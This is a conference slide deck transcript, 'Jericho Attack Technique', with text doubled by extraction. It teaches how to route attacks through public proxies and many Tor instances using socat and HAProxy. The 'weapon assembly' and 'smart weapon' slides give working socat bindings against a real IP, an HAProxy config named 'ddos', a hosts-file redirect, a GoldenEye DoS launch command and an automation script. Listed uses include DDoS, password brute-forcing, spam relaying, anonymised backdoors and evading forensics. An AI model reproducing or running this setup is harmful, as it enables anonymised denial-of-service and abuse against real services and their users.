Jericho Attack Technique
-
Upload
jan-seidl -
Category
Technology
-
view
2.672 -
download
4
description
Transcript of Jericho Attack Technique
Jericho Attack TechniqueJericho Attack TechniqueCluster-bombing TCP attacks for maximum impactCluster-bombing TCP attacks for maximum impact
Jan SeidlJan [email protected]@wroot.org
@jseidl@jseidl
$ whoami$ whoamiAboutAbout
Full Name: Jan SeidlFull Name: Jan Seidl
Origin: Rio de Janeiro, RJ – BrazilOrigin: Rio de Janeiro, RJ – Brazil
Work:Work:● CTO @ TI SafeCTO @ TI Safe● OpenSource contributor for: PEV, LogstashOpenSource contributor for: PEV, Logstash● Codes and snippets @ github.com/jseidlCodes and snippets @ github.com/jseidl
Features:Features:● UNIX Evangelist/Addict/Freak (but no fanboy!)UNIX Evangelist/Addict/Freak (but no fanboy!)● Python and C loverPython and C lover● Coffee dependentCoffee dependent● Hates printers and social networksHates printers and social networks● Proud DC Labs ResearcherProud DC Labs Researcher Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
$ whoami$ whoami
Jericho Attack Technique. SEIDL, JanValeSecConf/2013 – São Jose dos Campos, Brazil
STUPID, BROKE, NERD, BROKESTUPID, BROKE, NERD, BROKE
DisclaimerDisclaimer
‘‘Jericho’ is a product from the fictional company ‘Stark Jericho’ is a product from the fictional company ‘Stark
Industries’ from “The Iron Man” movie franchise from Industries’ from “The Iron Man” movie franchise from
Paramount Pictures and Marvel Studios, as well as any Paramount Pictures and Marvel Studios, as well as any
related picture presented in this presentation.related picture presented in this presentation.
Please do not sue me.Please do not sue me.
Jericho Attack Technique. SEIDL, JanValeSecConf/2013 – São Jose dos Campos, Brazil
\x00 Overview\x00 Overview
\x01 Application / Uses \x01 Application / Uses
\x02 Required Parts\x02 Required Parts
\x03 Weapon Assembly\x03 Weapon Assembly
\x04 Weapon Tuning\x04 Weapon Tuning
\x05 Launching the attack\x05 Launching the attack
\x06 Weapon Maintenance\x06 Weapon Maintenance
\x07 Escalating Firepower\x07 Escalating Firepower
\x08 Turning into a Smart Weapon\x08 Turning into a Smart Weapon
\x09 Demo!\x09 Demo!
Jericho Attack Technique. SEIDL, JanValeSecConf/2013 – São Jose dos Campos, Brazil
AgendaAgenda
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
The attack consists on utilizing The attack consists on utilizing public SOCKS proxiespublic SOCKS proxies
and and TOR instancesTOR instances through through socket multiplexing socket multiplexing
softwaresoftware (e.g.: Load Balancing/Cluster software) as (e.g.: Load Balancing/Cluster software) as
relays for attacks in a load-balancing fashionrelays for attacks in a load-balancing fashion
At a glance
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
public SOCKS proxies + TOR instances + socket public SOCKS proxies + TOR instances + socket
multiplexing softwaremultiplexing software
At a glance
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverviewAt a glance
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverviewSchematics
Attacker
Proxy 1
Proxy 2
Proxy 3
Proxy 4
Proxy 5
Proxy 6
Proxy 7
VictimHAProxy
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
Evading connection and rate limitingEvading connection and rate limiting
Bypassing country/origin restrictionsBypassing country/origin restrictions
Hiding origin of attacks, making forensics people sad :(Hiding origin of attacks, making forensics people sad :(
Low bandwidth attack such as Layer 7 DOS attacksLow bandwidth attack such as Layer 7 DOS attacks
Very efficient for
Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)http://slidesha.re/14yYiuVhttp://slidesha.re/14yYiuV
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Overview Overview
At first HAProxy may seem as a load balancer strictly At first HAProxy may seem as a load balancer strictly
for HTTP(S), but it’s not. for HTTP(S), but it’s not.
HAProxy’s actual description is “The Reliable, High HAProxy’s actual description is “The Reliable, High
Performance Performance TCPTCP/HTTP Load Balancer”. /HTTP Load Balancer”.
Cool, huh? Cool, huh?
Paying closer attention
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Uses Uses Applications for the Jericho Attack Technique
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Uses Uses
Web scraping/spideringWeb scraping/spidering
Limited API requestsLimited API requests
IP-based anti-fraud schemes (eg: Online Voting)IP-based anti-fraud schemes (eg: Online Voting)
User enumerationUser enumeration
Password brute-forcingPassword brute-forcing
Basic multiplexing use
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Uses Uses
Making Layer 7 Denial-of-Service attacks into Making Layer 7 Denial-of-Service attacks into
distributed configuration (DoS → DdoS)distributed configuration (DoS → DdoS)
(I like this one very much in particular)(I like this one very much in particular)
Hitting hard
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Uses Uses
Multiplexing mail relays for SPAMMultiplexing mail relays for SPAM
Multiplexing and anonymizing backdoor connections / Multiplexing and anonymizing backdoor connections /
commandscommands
Even more? Go crazy!Even more? Go crazy!
Going deeper
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Uses Uses
FTPFTP
SMTP(S) POP3(S) IMAP(S)SMTP(S) POP3(S) IMAP(S)
SSHSSH
RDP / VNCRDP / VNC
MySQLMySQL
many more...many more...
Possibly supported protocols
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired partsBuilding the weapon
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired partsMain assembly
Socat: Multipurpose RelaySocat: Multipurpose Relayhttp://www.dest-unreach.org/socat/http://www.dest-unreach.org/socat/
SSL support:SSL support:
HTTPS, IMAPS, POPS, LDAPSHTTPS, IMAPS, POPS, LDAPS
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired partsMain assembly
HAProxyHAProxyhttp://haproxy.1wt.eu/http://haproxy.1wt.eu/
““The Reliable, High Performance TCP/HTTP Load The Reliable, High Performance TCP/HTTP Load
Balancer”Balancer”
REQUEST → HAPROXY → { SERVER A, SERVER B, REQUEST → HAPROXY → { SERVER A, SERVER B,
SERVER C }SERVER C }
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired partsResources
SOCKS/HTTP(S) ProxiesSOCKS/HTTP(S) Proxies
http://www.proxynova.com/proxy-server-list/http://www.proxynova.com/proxy-server-list/
http://hidemyass.com/proxy-list/http://hidemyass.com/proxy-list/
Just google it...Just google it...
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired partsResources
TOR exit nodesTOR exit nodes
PRO TIP: You can run as many TOR tunnels as you want (:PRO TIP: You can run as many TOR tunnels as you want (:
tor --RunAsDaemon 1 --CookieAuthentication 0 tor --RunAsDaemon 1 --CookieAuthentication 0
--HashedControlPassword "pwd" --ControlPort 4444 --PidFile --HashedControlPassword "pwd" --ControlPort 4444 --PidFile
torN.pid --SocksPort 9050 --DataDirectory data/torNtorN.pid --SocksPort 9050 --DataDirectory data/torN
Multi-TORMulti-TOR
https://github.com/jseidl/Multi-TOR/https://github.com/jseidl/Multi-TOR/
EX: ./multi-tor.sh 5 # Opens 5 TOR instancesEX: ./multi-tor.sh 5 # Opens 5 TOR instances
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired partsImportant Note
The proxies may or may not require authentication since socat The proxies may or may not require authentication since socat
supports proxy authentication adding the parameter as follows:supports proxy authentication adding the parameter as follows:
proxyauth=user:passproxyauth=user:pass
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired partsImportant Note
Some public proxies append additional headers like X-Forwarded-For that Some public proxies append additional headers like X-Forwarded-For that
may ruin the whole purpose of utilizing a Jericho attack perspective. may ruin the whole purpose of utilizing a Jericho attack perspective.
(Thanks for Lucas Fernando Amorim for remembering that!)(Thanks for Lucas Fernando Amorim for remembering that!)
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired partsImportant Note
For TOR, one can use For TOR, one can use two-hop circuits for maximum two-hop circuits for maximum
performance and degraded anonymityperformance and degraded anonymity or or greater-hop greater-hop
circuits for greater anonymity and degraded performancecircuits for greater anonymity and degraded performance. .
It just depends on the use.It just depends on the use.
Tor: Four Hops instead of ThreeTor: Four Hops instead of Threehttp://coldwaterq.com/?11http://coldwaterq.com/?11
TOR Auto-circuitTOR Auto-circuithttps://thesprawl.org/projects/tor-autocircuit/https://thesprawl.org/projects/tor-autocircuit/
TOR control protocolTOR control protocolhttps://thesprawl.org/research/tor-control-protocol/https://thesprawl.org/research/tor-control-protocol/
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts(not so) Important Note
I’ve developed a python tool named (albeit not very creatively) I’ve developed a python tool named (albeit not very creatively) proxygetproxyget..
BeautifulSoup + Mechanize = Smart Scraping!BeautifulSoup + Mechanize = Smart Scraping!
Scripting → HAProxy.conf auto-generation for a Jericho attackScripting → HAProxy.conf auto-generation for a Jericho attack
This tool is yet to be released. Stay tuned!This tool is yet to be released. Stay tuned!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon AssemblySticking the parts together
Easy simple steps:Easy simple steps:
1. Create lots of socat bindings to the victim, each from a 1. Create lots of socat bindings to the victim, each from a different resource (proxy or TOR instance)different resource (proxy or TOR instance)
2. Configure the locally bound socat ports in HAProxy2. Configure the locally bound socat ports in HAProxy
3. Point victim's DNS name to localhost on /etc/hosts3. Point victim's DNS name to localhost on /etc/hosts
4. Fire at will4. Fire at will
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon AssemblySticking the parts together: socat with proxies
# socat TCP4-LISTEN:80 # socat TCP4-LISTEN:80 PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>
# socat TCP4-LISTEN:8081 # socat TCP4-LISTEN:8081 PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080
Example:Example:
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon AssemblySticking the parts together: socat with TOR
# socat TCP4LISTEN:80,fork # socat TCP4LISTEN:80,fork SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050 SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050
# socat TCP4-LISTEN:8081 # socat TCP4-LISTEN:8081 SOCKS4A:localhost:93.184.216.119:80,socksport=9050SOCKS4A:localhost:93.184.216.119:80,socksport=9050
Example:Example:
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon AssemblySticking the parts together: HAProxy
listen ddos 0.0.0.0:80listen ddos 0.0.0.0:80 mode tcpmode tcp balancebalance roundrobinroundrobin serverserver inst1 localhost:8080inst1 localhost:8080 serverserver inst2 localhost:8081inst2 localhost:8081 serverserver inst3 localhost:8082inst3 localhost:8082 serverserver inst4 localhost:8083inst4 localhost:8083
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon AssemblySticking the parts together: HAProxy (larger sample)
globalglobal maxconn 10000 maxconn 10000 # set this accordingly to MAX within your kernel socket limits# set this accordingly to MAX within your kernel socket limits user haproxyuser haproxy group haproxygroup haproxy daemondaemon
defaultsdefaults mode tcp mode tcp retries 3retries 3 option redispatchoption redispatch maxconn 20000 maxconn 20000 # set accordingly# set accordingly contimeout 5000 contimeout 5000 # set accordingly# set accordingly clitimeout 50000 clitimeout 50000 # set accordingly# set accordingly srvtimeout 50000 srvtimeout 50000 # set accordingly# set accordingly
# Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied # Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied sockets. sockets.
listen jericho 0.0.0.0:80 listen jericho 0.0.0.0:80 # just a instance name# just a instance name mode tcp mode tcp balance roundrobin balance roundrobin # gives more time within socket/outoging IP reuse# gives more time within socket/outoging IP reuse server inst1 localhost:8080 server inst1 localhost:8080 # SOCKS proxy# SOCKS proxy server inst2 localhost:9051 server inst2 localhost:9051 # TOR instance# TOR instance server inst3 localhost:9052 server inst3 localhost:9052 # TOR instance# TOR instance
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon AssemblySticking the parts together: /etc/hosts
# Jericho target below this line# Jericho target below this line# make him suffer (:# make him suffer (:example.com, www.example.comexample.com, www.example.com 127.0.0.1127.0.0.1
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon AssemblyTa-da!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon TuningWeapon TuningMoar firepower!Moar firepower!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon TuningWeapon TuningAbout performanceAbout performance
There are several parameters on the linux kernel that can be There are several parameters on the linux kernel that can be
tuned in order to achieve better TCP performance. tuned in order to achieve better TCP performance.
Because ‘performance’ is relative to the attack being conducted Because ‘performance’ is relative to the attack being conducted
(you may need more bandwidth or more concurrent connections (you may need more bandwidth or more concurrent connections
or anything else), there are several options that one must or anything else), there are several options that one must
consider.consider.
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon TuningWeapon TuningLinux Tuning ResourcesLinux Tuning Resources
TCP Performance Tuning | SoftpanoramaTCP Performance Tuning | Softpanoramahttp://bit.ly/17RiLWvhttp://bit.ly/17RiLWv
Linux Tweaking | Speedguide.netLinux Tweaking | Speedguide.nethttp://bit.ly/18JDnlLhttp://bit.ly/18JDnlL
Improving TCP performance over a gigabit network with lots of Improving TCP performance over a gigabit network with lots of
connections and high traffic of small packets | ServerFaultconnections and high traffic of small packets | ServerFaulthttp://bit.ly/1fRyjhZhttp://bit.ly/1fRyjhZ
Linux TCP/IP Tuning | LognormalLinux TCP/IP Tuning | Lognormalhttp://bit.ly/17Rj8QNhttp://bit.ly/17Rj8QN
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attack
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attackCheck that everything is workingCheck that everything is working
You may want to socat resources first to an IP testing website to You may want to socat resources first to an IP testing website to
verify that Jericho is working successfullyverify that Jericho is working successfully
Then rebind sockets to final destination (victim)Then rebind sockets to final destination (victim)
(don't forget the /etc/hosts entry!)(don't forget the /etc/hosts entry!)
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attackFire in the hole!Fire in the hole!
# ./goldeneye.py http://www.example.com/index.php -t # ./goldeneye.py http://www.example.com/index.php -t
1000 -m get1000 -m get
Ahhh... easy and transparent!Ahhh... easy and transparent!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attackFire in the hole!Fire in the hole!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon MaintenanceWeapon Maintenance
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon MaintenanceWeapon Maintenance
Check if your exit proxies are still working and not blockedCheck if your exit proxies are still working and not blocked
Check if your TOR identities aren't blockedCheck if your TOR identities aren't blocked
Gather new proxies and reconfigureGather new proxies and reconfigure
Renew TOR identities (tor_newid.sh, part of Multi-TOR)Renew TOR identities (tor_newid.sh, part of Multi-TOR)
Keeping the blade sharpKeeping the blade sharp
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon MaintenanceWeapon Maintenance
Watchdog daemons / scriptsWatchdog daemons / scripts
Cron jobsCron jobs
Manual checkingManual checking
Keeping the blade sharpKeeping the blade sharp
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Multiple Jericho setups on many hostsMultiple Jericho setups on many hosts
++
Intermediary Forwarder/Multiplexer Jericho node(s)Intermediary Forwarder/Multiplexer Jericho node(s)
++
Multiple or single attack sourcesMultiple or single attack sources
Large-size clustered attack environmentsLarge-size clustered attack environments
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Single-tier cascading Jericho architechtureSingle-tier cascading Jericho architechture
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Multi-tier cascading Jericho architechtureMulti-tier cascading Jericho architechture
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weaponInitialization SequenceInitialization Sequence
Define Resources
multi-tor.sh
proxyget.py IP PORTlist
TOR socketlist
joinlists.sh jericho.res
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weaponAutomatic testingAutomatic testing
testresources.shjericho.resall resources
valid?proceed
gather andrevalidate resources
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weaponSelf-configurationSelf-configuration
initjericho.sh
list2socat.sh
list2haproxycfg.sh haproxy.cfg
jericho.resreload
haproxy
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weaponFull routineFull routine
Initialize Configure Test Run
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weaponPoor-man's smart JerichoPoor-man's smart Jericho
# Gather proxy list
./proxyget.py --minanon high --minspd medium --type http --quantity 200
> /tmp/proxies
# Parse list
cut -f3,7 -d' ' /tmp/proxies > /tmp/parsedproxy
# Spawn socat entries
./gensocat.sh 93.184.216.119 /tmp/parsedproxy
# Reconfigure haproxy
echo "$HAPROXYCONF_HEAD" > /tmp/haproxy
./genhaproxycfg.sh 200 >> /tmp/haproxy
cp /etc/haproxy/haproxy.cfg /etc/haproxy/haproxy.cfg.old
cp /tmp/haproxy /etc/haproxy/haproxy.cfg
/etc/init.d/haproxy restart
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weaponWhat else?What else?
Web Interfaces?Web Interfaces?
API?API?
Cloud-hosted?Cloud-hosted?
Quick-deploy packages?Quick-deploy packages?
Jericho-as-a-Service (JaaS)?Jericho-as-a-Service (JaaS)?
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Demo (:Demo (:
Jericho Attack Technique @ YouTubeJericho Attack Technique @ YouTubehttp://youtu.be/YRMyW2OA0gIhttp://youtu.be/YRMyW2OA0gI
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Questions?Questions?
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Thank you!Thank you!
– – To peace!To peace!
[email protected] / @jseidl / http://wroot.org